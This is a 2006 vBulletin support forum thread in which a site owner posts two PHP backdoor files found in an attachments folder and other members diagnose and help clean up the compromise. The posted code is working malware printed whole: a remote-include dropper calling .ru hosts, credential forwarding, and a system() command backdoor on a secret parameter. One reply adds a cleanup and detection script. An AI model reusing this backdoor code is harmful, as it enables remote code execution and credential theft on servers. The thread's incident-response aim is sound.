Is this a trojan or backdoor in my images/attachments folder?

    During a recent server change, I found these suspicious .php files in my images/attachments folder.

    First file is called 'includes.php' and contains the following code:

    PHP Code:
    <?
    // Suppress all errors so nothing is logged or displayed
    error_reporting(0);
    $s = "e";
    // Collect request details, falling back to the old register_globals names
    $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
    $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
    $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    // Pack everything, base64-encoded, into a dotted query string
    $str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s";
    // Fetch and execute remote PHP via include() over HTTP (needs allow_url_fopen/allow_url_include).
    // "aHR0cDovLw==" decodes to "http://"; the two hostnames decode to user9.mshtml.ru and user7.htmltags.ru
    if ((include(base64_decode("aHR0cDovLw==") . base64_decode("dXNlcjkubXNodG1sLnJ1") . "/?" . $str))) {
    } else {
        include(base64_decode("aHR0cDovLw==") . base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=") . "/?" . $str);
    }
    ?>

    The second file is called configs.php and contains the following code:

    PHP Code:
    <?php
    error_reporting(0);
    // Credentials posted as "l" and "p" are forwarded to the remote host
    if (isset($_POST["l"]) and isset($_POST["p"])) {
        if (isset($_POST["input"])) {
            $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));
        } else {
            $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];
        }
    } else {
        $user_auth = "";
    }
    if (!isset($_POST["log_flg"])) { $log_flg = "&log"; }
    // Try to fetch and run remote PHP; the base64 string decodes to
    // "http://bis.iframe.ru/master.php?r_addr=" followed by the visitor's IP and the current URL
    if (! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {
        // Fallback when the remote host is unreachable: execute a command taken from a GET
        // parameter, or print the kernel version when l=special
        if (isset($_GET["a3kfj39fsj2"])) { system($_GET["a3kfj39fsj2"]); }
        if ($_POST["l"] == "special") { print "sys_active" . `uname -a`; }
    }
    ?>

    I've also found this code in two files in each of the subdirectories of all of my photopost image folders as well.

    Can anyone shed some light on this?
    Last edited by Lt. Dan; Fri 3 Feb '06, 1:25am.

  • #2
    Firstly, I don't see an images/attachments folder... similar I know but images/attach yes, but not the one you mentioned.

    Also, I don't see those files in my images/attach folder.

    This doesn't necessarily mean that you have been hacked, as it may be related to storing the attachments in the database/filesystem, but I'd submit a support ticket for this and ask vB Staff to comment for you.
    John

    • #3
      By default you won't have this folder. I moved my attachments out of the database and into this folder. The guy that found them told me that these files are phoning home to someone and that they open my server up to vulnerabilities. My question is, how did they get there? He says they appear to have been uploaded via http and not ftp... ???

      • #4
        Submit a support ticket and get vB Staff to provide you with the correct information. If I were you, I'd close my board temporarily too.

        I would also rename those files... or move them to a secure area for subsequent investigation. It seems to me now that your board is vulnerable at the moment.
        John

        • #5
          I have another board running on 3.5.3 and I've found that it too already has these PHP files embedded in all the attachment folders as well.

          Every attachment folder has a messages.php and a configs.php file in them with the same code.

          • #6
            I didn't really analyze the scripts you posted, but it looks like someone gained access to your server and placed some unknown scripts there.

            You might want to check your server logs to see how they got there.

            I also suggest you ask your host for support on cleaning the server after a possible hack.
            Want to take your board beyond the standard vBulletin features?
            Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

            • #7
              Originally posted by MarcoH64
              I didn't really analyze the scripts you posted, but it looks like someone gained access to your server and placed some unknown scripts there.

              You might want to check your server logs to see how they got there.

              I also suggest you ask your host for support on cleaning the server after a possible hack.
              It's very odd that these same files appeared in a new directory on a different forum in the same locations.

              The guy that analyzed them for me said they were uploaded via http and not ftp, which he thought was odd.

              I also found a .htaccess file in each of the attachment directories which appears to reference the suspect .php files.
              Last edited by Lt. Dan; Wed 15 Feb '06, 5:19am.

              • #8
                What permissions do you have on these folders? I have avatars and attachments stored in the filesystem, and when I did the conversion, vB set up the directories for me. I went in now and noticed that permissions are 707 for both of these directories, meaning they are writeable. Had I known, I may have opted to keep these in the database.

                Didn't find these files mentioned above, but IMHO, it's only a matter of time before someone attempts it. I wish the conversion function in vB had warned me about this beforehand. (Or maybe it did, and I don't remember...?)

                The only cure I can think of is a cron job that would delete any files with the .php extension, since these folders contain only images. Or even set up my own PHP script to run via cron that would clear out anything that is not an image file. Not the best idea, but it might work for now...

                Originally posted by Lt. Dan
                I also found a .htaccess file in each of the attachment directories which appears to reference the suspect .php files.
                Could you post the contents of that here (removing anything sensitive, of course)?
                Last edited by RedWingFan; Wed 15 Feb '06, 6:32am.
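                One way to act on the cron-job idea above, as an added example that is not code from this thread or from vBulletin: a POSIX sh script that quarantines anything in the attachment tree that is not an image (moved, not deleted, so it stays available as evidence) and greps the rest of the web root for files carrying the traits of the two posted scripts (a remote include built from base64_decode(), or system() fed from a request parameter). All paths are placeholders, and the sample files in the test are constructed.

```shell
#!/bin/sh
# Added example, not code from the thread or from vBulletin: a cron-able
# cleanup for attachment directories plus a content check for files
# resembling the two posted backdoors. All paths are placeholders.

# Return 0 when a file shows the traits of includes.php / configs.php above:
# a remote include built from base64_decode(), or system() fed directly
# from a request parameter. Return 1 otherwise.
is_suspicious_php() {
    grep -qE '(include|require)(_once)?[[:space:]]*\(.*base64_decode\(|system[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST)\[' "$1"
}

# Move every non-image file out of an attachment tree into a quarantine
# directory, keeping its relative path. Files are moved, not deleted, so
# they remain available as evidence (this also catches a planted .htaccess).
quarantine_non_images() {
    attach_dir="$1"; quarantine="$2"
    tmp=$(mktemp)
    find "$attach_dir" -type f > "$tmp"
    while IFS= read -r f; do
        case "$f" in
            *.jpg|*.jpeg|*.gif|*.png|*.bmp|*.JPG|*.JPEG|*.GIF|*.PNG|*.BMP) continue ;;
        esac
        rel=${f#"$attach_dir"/}
        mkdir -p "$quarantine/$(dirname "$rel")"
        mv "$f" "$quarantine/$rel"
        echo "quarantined: $f"
    done < "$tmp"
    rm -f "$tmp"
}

# Run as: sh scan.sh WEBROOT ATTACH_DIR QUARANTINE_DIR (placeholders).
# The first pass checks every file under the web root, not only *.php,
# since the dropper may hide inside an ordinary-looking file; the second
# cleans the attachment tree, which should hold images only.
if [ "$#" -eq 3 ]; then
    find "$1" -type f | while IFS= read -r f; do
        if is_suspicious_php "$f"; then echo "suspicious: $f"; fi
    done
    quarantine_non_images "$2" "$3"
fi
```

Review the quarantine directory by hand afterwards; a legitimate file that happens not to be an image will land there too, and the logs for the matching request times are the place to find how the files arrived.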

                • #9
                  It looks like a backdoor shell uploaded by a script kid to your forum directories.
                  Delete those files at once, change all DB passwords, change all users' passwords,
                  ask your hoster to change your FTP access pass,
                  and I would recommend deleting all files from the server and replacing them with new ones downloaded from vbulletin.com.

                  btw.. this part

                  PHP Code:
                  ("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"
                  after decoding gives

                  you are pwned
                  Last edited by sensimilla; Wed 15 Feb '06, 6:39am.

                  • #10
                    Originally posted by sensimilla
                    It looks like a backdoor shell uploaded by a script kid to your forum directories.
                    Delete those files at once, change all DB passwords, change all users' passwords,
                    ask your hoster to change your FTP access pass,
                    and I would recommend deleting all files from the server and replacing them with new ones downloaded from vbulletin.com.

                    btw.. this part

                    PHP Code:
                    ("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"
                    after decoding gives
                    you are pwned
                    That's what I was thinking myself. Nothing has happened on my server, so I'm guessing this was something automated. These files only show up in my VBB images/attachments folders and no place else.

                    I installed a second VBB to my server about a month ago and these files popped up in this one too.

                    The image/attachments folder is the default location that VBB looks to put attachments when you pull them out of the database, so perhaps it's a script that looks to exploit those folders. VBB recommended CHMOD 777 when I created that folder, so that directory and all files are 777, which is probably how it was exploited.

                    The guy that found this on my server said that these scripts will allow the hacker to execute any function allowed on my server, but I've never had anything malicious happen on my server.

                    • #11
                      You don't always need to notice something if you are hacked. It could also be that your server is used for spamming or to do a DDoS attack.

                      • #12
                        Originally posted by MarcoH64
                        You don't always need to notice something if you are hacked. It could also be that your server is used for spamming or to do a DDoS attack.
                        Agreed, that is why I'm trying to find out what is going on. I've got the VBB guys looking at this as well. I dug through all of my files and haven't found this any place else.

                        I deleted all the suspicious PHP and .htaccess files and then uploaded my attachments into a directory with a different name to see if these files reappear.

                        The odd thing is that these files were uploaded via http, not ftp. How was this done?

                        • #13
                          Probably by a script somewhere on your server that you have not found yet.

                          • #14
                            Originally posted by MarcoH64
                            Probably by a script somewhere on your server that you have not found yet.
                            If that is the case, deleting everything in my public_html directory should get it, right?

                            • #15
                              Only if the hack is done on your account.

                              Is it a dedicated server, or shared hosting?

                              PS The script could be almost anywhere on your server, even embedded in a regular file/script.

                              There are some tools to help find this kind of thing, like chkrootkit; your host should know more about them. Unfortunately, unless you can find exactly how the server was compromised and you can find all traces of it, the only secure way to get rid of things like this is a complete new install (OS and everything) with clean files.